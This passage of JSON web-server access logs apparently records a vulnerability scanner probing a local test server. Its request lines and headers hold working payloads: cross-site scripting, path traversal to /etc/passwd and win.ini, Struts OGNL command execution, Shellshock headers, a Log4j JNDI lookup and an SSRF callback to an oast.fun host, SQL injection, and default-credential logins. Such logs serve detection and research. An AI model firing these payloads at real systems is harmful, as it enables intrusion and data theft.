+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.ca285tosmpvbafqg07h0g4nkkbt7tntp7.oast.fun}"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22test_type\x22:\x22ip\x22,\x22test_debug\x22:false,\x22ipnotify_type\x22:\x22http/get\x22,\x22ipnotify_address\x22:\x22http://ca285tosmpvbafqg07h0ecgupezawkp1d.oast.fun\x22,\x22ipnotify_username\x22:\x22\x22,\x22ipnotify_password\x22:\x22\x22,\x22ipnotify_port\x22:\x220\x22,\x22ipnotify_content_type\x22:\x22\x22,\x22ipnotify_template\x22:\x22\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configure/app/landing/welcome-srm-va.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test-cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 